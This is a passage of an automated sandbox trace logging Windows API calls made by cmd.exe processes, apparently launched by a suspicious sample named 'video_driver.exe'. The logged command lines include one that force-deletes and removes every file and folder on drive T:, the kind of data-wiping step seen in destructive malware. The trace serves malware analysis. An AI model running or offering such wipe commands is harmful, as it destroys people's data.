(_String1="rmdir", _String2=")") returned 73 [0068.881] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0068.881] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0068.881] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0068.881] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0068.881] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0068.881] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0068.881] GetProcessHeap () returned 0x6c0000 [0068.881] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x58) returned 0x6d3410 [0068.881] GetProcessHeap () returned 0x6c0000 [0068.881] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x14) returned 0x6d3470 [0068.881] GetProcessHeap () returned 0x6c0000 [0068.881] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x20) returned 0x6d57e0 [0068.883] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0068.885] GetFullPathNameW (in: lpFileName="S:", nBufferLength=0x208, lpBuffer=0x41f400, lpFilePart=0x41f1ac | out: lpBuffer="S:\\", lpFilePart=0x41f1ac*=0x0) returned 0x3 [0068.885] wcsncmp (_String1="S:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -9 [0068.889] GetFileAttributesW (lpFileName="S:\\" (normalized: "s:")) returned 0xffffffff [0068.889] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.889] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.890] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.890] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.890] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.890] SetConsoleInputExeNameW () returned 0x1 [0068.890] GetConsoleOutputCP () returned 0x1b5 [0068.890] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.890] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.891] exit (_Code=0) Process: id = "64" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4199f000" os_pid = "0xb18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"T:\" del /f /s /q \"T:\" & FOR /D %p IN (\"T:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 92 os_tid = 0xb1c [0068.989] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfca4 | out: lpSystemTimeAsFileTime=0x1cfca4*(dwLowDateTime=0x6ed4020, dwHighDateTime=0x1d62400)) [0068.989] GetCurrentProcessId () returned 0xb18 [0068.989] GetCurrentThreadId () returned 0xb1c [0068.989] GetTickCount () returned 0x1148a94 [0068.989] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfc9c | out: lpPerformanceCount=0x1cfc9c*=18912293733) returned 1 [0068.991] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0068.991] __set_app_type (_Type=0x1) [0068.991] __p__fmode () returned 0x770331f4 [0068.991] __p__commode () returned 0x770331fc [0068.992] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0068.992] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0068.992] GetCurrentThreadId () returned 0xb1c [0068.992] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb1c) returned 0x60 [0068.993] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0068.993] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0068.993] SetThreadUILanguage (LangId=0x0) returned 0x409 [0068.994] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0068.994] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfc34 | out: phkResult=0x1cfc34*=0x0) returned 0x2 [0068.994] VirtualQuery (in: lpAddress=0x1cfc6b, lpBuffer=0x1cfc04, dwLength=0x1c | out: lpBuffer=0x1cfc04*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.994] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfc04, dwLength=0x1c | out: lpBuffer=0x1cfc04*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.994] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfc04, dwLength=0x1c | out: lpBuffer=0x1cfc04*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0068.994] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfc04, dwLength=0x1c | out: lpBuffer=0x1cfc04*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0068.994] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfc04, dwLength=0x1c | out: lpBuffer=0x1cfc04*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x39000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0068.994] GetConsoleOutputCP () returned 0x1b5 [0068.994] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0068.995] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0068.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.995] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0068.995] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.995] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0068.996] _get_osfhandle (_FileHandle=1) returned 0x7 [0068.996] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0068.996] _get_osfhandle (_FileHandle=0) returned 0x3 [0068.996] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0068.996] GetEnvironmentStringsW () returned 0x5820f8* [0068.996] GetProcessHeap () returned 0x570000 [0068.996] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xaca) returned 0x582bd0 [0068.997] FreeEnvironmentStringsW (penv=0x5820f8) returned 1 [0068.997] GetProcessHeap () returned 0x570000 [0068.997] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x4) returned 0x581898 [0068.997] GetEnvironmentStringsW () returned 0x5820f8* [0068.997] GetProcessHeap () returned 0x570000 [0068.997] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xaca) returned 0x5836a8 [0068.997] FreeEnvironmentStringsW (penv=0x5820f8) returned 1 [0068.997] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ceba4 | out: phkResult=0x1ceba4*=0x68) returned 0x0 [0068.998] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebac, lpData=0x1cebb0, lpcbData=0x1ceba8*=0x1000 | out: lpType=0x1cebac*=0x0, lpData=0x1cebb0*=0x0, lpcbData=0x1ceba8*=0x1000) returned 0x2 [0068.998] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebac, lpData=0x1cebb0, lpcbData=0x1ceba8*=0x1000 | out: lpType=0x1cebac*=0x4, lpData=0x1cebb0*=0x1, lpcbData=0x1ceba8*=0x4) returned 0x0 [0068.998] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebac, lpData=0x1cebb0, lpcbData=0x1ceba8*=0x1000 | out: lpType=0x1cebac*=0x0, lpData=0x1cebb0*=0x1, lpcbData=0x1ceba8*=0x1000) returned 0x2 [0068.998] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebac, lpData=0x1cebb0, lpcbData=0x1ceba8*=0x1000 | out: lpType=0x1cebac*=0x4, lpData=0x1cebb0*=0x0, lpcbData=0x1ceba8*=0x4) returned 0x0 [0068.998] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebac, lpData=0x1cebb0, lpcbData=0x1ceba8*=0x1000 | out: lpType=0x1cebac*=0x4, lpData=0x1cebb0*=0x40, lpcbData=0x1ceba8*=0x4) returned 0x0 [0068.998] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebac, lpData=0x1cebb0, lpcbData=0x1ceba8*=0x1000 | out: lpType=0x1cebac*=0x4, lpData=0x1cebb0*=0x40, lpcbData=0x1ceba8*=0x4) returned 0x0 [0068.998] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebac, lpData=0x1cebb0, lpcbData=0x1ceba8*=0x1000 | out: lpType=0x1cebac*=0x0, lpData=0x1cebb0*=0x40, lpcbData=0x1ceba8*=0x1000) returned 0x2 [0068.998] RegCloseKey (hKey=0x68) returned 0x0 [0068.998] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ceba4 | out: phkResult=0x1ceba4*=0x68) returned 0x0 [0068.998] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebac, lpData=0x1cebb0, lpcbData=0x1ceba8*=0x1000 | out: lpType=0x1cebac*=0x0, lpData=0x1cebb0*=0x40, lpcbData=0x1ceba8*=0x1000) returned 0x2 [0068.998] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebac, lpData=0x1cebb0, lpcbData=0x1ceba8*=0x1000 | out: lpType=0x1cebac*=0x4, lpData=0x1cebb0*=0x1, lpcbData=0x1ceba8*=0x4) returned 0x0 [0068.999] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebac, lpData=0x1cebb0, lpcbData=0x1ceba8*=0x1000 | out: lpType=0x1cebac*=0x0, lpData=0x1cebb0*=0x1, lpcbData=0x1ceba8*=0x1000) returned 0x2 [0068.999] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebac, lpData=0x1cebb0, lpcbData=0x1ceba8*=0x1000 | out: lpType=0x1cebac*=0x4, lpData=0x1cebb0*=0x0, lpcbData=0x1ceba8*=0x4) returned 0x0 [0068.999] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebac, lpData=0x1cebb0, lpcbData=0x1ceba8*=0x1000 | out: lpType=0x1cebac*=0x4, lpData=0x1cebb0*=0x9, lpcbData=0x1ceba8*=0x4) returned 0x0 [0068.999] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebac, lpData=0x1cebb0, lpcbData=0x1ceba8*=0x1000 | out: lpType=0x1cebac*=0x4, lpData=0x1cebb0*=0x9, lpcbData=0x1ceba8*=0x4) returned 0x0 [0068.999] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebac, lpData=0x1cebb0, lpcbData=0x1ceba8*=0x1000 | out: lpType=0x1cebac*=0x0, lpData=0x1cebb0*=0x9, lpcbData=0x1ceba8*=0x1000) returned 0x2 [0068.999] RegCloseKey (hKey=0x68) returned 0x0 [0068.999] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6e [0068.999] srand (_Seed=0x5eb34b6e) [0068.999] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"T:\" del /f /s /q \"T:\" & FOR /D %p IN (\"T:\") DO rmdir \"%p\" /s /q" [0068.999] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"T:\" del /f /s /q \"T:\" & FOR /D %p IN (\"T:\") DO rmdir \"%p\" /s /q" [0068.999] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.000] GetProcessHeap () returned 0x570000 [0069.000] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x210) returned 0x5820f8 [0069.000] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x582100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0069.000] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.000] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.000] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.000] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0069.000] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0069.000] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0069.000] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0069.000] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0069.000] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0069.000] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0069.000] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0069.001] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0069.001] GetProcessHeap () returned 0x570000 [0069.001] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x582bd0 | out: hHeap=0x570000) returned 1 [0069.001] GetEnvironmentStringsW () returned 0x582310* [0069.001] GetProcessHeap () returned 0x570000 [0069.001] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xae2) returned 0x584c70 [0069.001] FreeEnvironmentStringsW (penv=0x582310) returned 1 [0069.001] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0069.001] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.001] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0069.001] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0069.001] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0069.001] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0069.001] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0069.001] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0069.001] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0069.001] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0069.001] GetProcessHeap () returned 0x570000 [0069.002] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x54) returned 0x5817c8 [0069.002] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf970 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.002] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf970, lpFilePart=0x1cf96c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf96c*="Desktop") returned 0x25 [0069.002] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.002] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf6ec | out: lpFindFileData=0x1cf6ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x585760 [0069.002] FindClose (in: hFindFile=0x585760 | out: hFindFile=0x585760) returned 1 [0069.002] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1cf6ec | out: lpFindFileData=0x1cf6ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x585760 [0069.002] FindClose (in: hFindFile=0x585760 | out: hFindFile=0x585760) returned 1 [0069.002] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0069.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1cf6ec | out: lpFindFileData=0x1cf6ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x585760 [0069.003] FindClose (in: hFindFile=0x585760 | out: hFindFile=0x585760) returned 1 [0069.003] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0069.003] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0069.003] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0069.003] GetProcessHeap () returned 0x570000 [0069.003] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584c70 | out: hHeap=0x570000) returned 1 [0069.003] GetEnvironmentStringsW () returned 0x584180* [0069.003] GetProcessHeap () returned 0x570000 [0069.003] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb36) returned 0x585fa0 [0069.003] FreeEnvironmentStringsW (penv=0x584180) returned 1 [0069.003] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.003] GetProcessHeap () returned 0x570000 [0069.004] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5817c8 | out: hHeap=0x570000) returned 1 [0069.004] GetProcessHeap () returned 0x570000 [0069.004] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x400e) returned 0x586ae0 [0069.004] GetProcessHeap () returned 0x570000 [0069.004] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xa0) returned 0x582e50 [0069.004] GetProcessHeap () returned 0x570000 [0069.004] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x586ae0 | out: hHeap=0x570000) returned 1 [0069.004] GetConsoleOutputCP () returned 0x1b5 [0069.004] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0069.005] GetUserDefaultLCID () returned 0x409 [0069.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0069.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfab0, cchData=128 | out: lpLCData="0") returned 2 [0069.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfab0, cchData=128 | out: lpLCData="0") returned 2 [0069.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfab0, cchData=128 | out: lpLCData="1") returned 2 [0069.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0069.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0069.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0069.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0069.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0069.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.006] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.006] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0069.006] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0069.006] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.008] GetProcessHeap () returned 0x570000 [0069.008] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20c) returned 0x582ef8 [0069.008] GetConsoleTitleW (in: lpConsoleTitle=0x582ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0069.009] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0069.009] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0069.009] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0069.009] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0069.010] GetProcessHeap () returned 0x570000 [0069.010] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x400a) returned 0x586ae0 [0069.010] GetProcessHeap () returned 0x570000 [0069.010] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x4008) returned 0x58aaf8 [0069.010] GetProcessHeap () returned 0x570000 [0069.010] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1a) returned 0x5857e0 [0069.010] GetEnvironmentVariableW (in: lpName="p IN (\"T", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.010] _wcsicmp (_String1="p IN (\"T", _String2="CD") returned 13 [0069.010] _wcsicmp (_String1="p IN (\"T", _String2="ERRORLEVEL") returned 11 [0069.011] _wcsicmp (_String1="p IN (\"T", _String2="CMDEXTVERSION") returned 13 [0069.011] _wcsicmp (_String1="p IN (\"T", _String2="CMDCMDLINE") returned 13 [0069.011] _wcsicmp (_String1="p IN (\"T", _String2="DATE") returned 12 [0069.011] _wcsicmp (_String1="p IN (\"T", _String2="TIME") returned -4 [0069.011] _wcsicmp (_String1="p IN (\"T", _String2="RANDOM") returned -2 [0069.011] _wcsicmp (_String1="p IN (\"T", _String2="HIGHESTNUMANODENUMBER") returned 8 [0069.011] GetProcessHeap () returned 0x570000 [0069.011] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5857e0 | out: hHeap=0x570000) returned 1 [0069.011] GetProcessHeap () returned 0x570000 [0069.011] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x58aaf8 | out: hHeap=0x570000) returned 1 [0069.011] GetProcessHeap () returned 0x570000 [0069.011] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x4008) returned 0x58aaf8 [0069.011] GetProcessHeap () returned 0x570000 [0069.011] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x58aaf8 | out: hHeap=0x570000) returned 1 [0069.011] GetProcessHeap () returned 0x570000 [0069.011] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x586ae0 | out: hHeap=0x570000) returned 1 [0069.011] _wcsicmp (_String1="if", _String2=")") returned 64 [0069.012] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0069.012] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0069.012] _wcsicmp (_String1="IF", _String2="if") returned 0 [0069.012] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0069.012] GetProcessHeap () returned 0x570000 [0069.012] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x58) returned 0x583110 [0069.012] GetProcessHeap () returned 0x570000 [0069.012] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xe) returned 0x57ffc0 [0069.012] GetProcessHeap () returned 0x570000 [0069.012] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x20) returned 0x5857e0 [0069.013] GetProcessHeap () returned 0x570000 [0069.013] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5857e0, Size=0x16) returned 0x581800 [0069.013] GetProcessHeap () returned 0x570000 [0069.013] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x581800) returned 0x16 [0069.013] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0069.014] GetProcessHeap () returned 0x570000 [0069.014] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x58) returned 0x583170 [0069.014] GetProcessHeap () returned 0x570000 [0069.014] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x14) returned 0x5831d0 [0069.014] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0069.014] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0069.014] GetProcessHeap () returned 0x570000 [0069.014] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x12) returned 0x5831f0 [0069.014] GetProcessHeap () returned 0x570000 [0069.014] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1c) returned 0x5857e0 [0069.014] GetProcessHeap () returned 0x570000 [0069.014] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5857e0, Size=0x14) returned 0x583210 [0069.014] GetProcessHeap () returned 0x570000 [0069.014] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x583210) returned 0x14 [0069.015] _wcsicmp 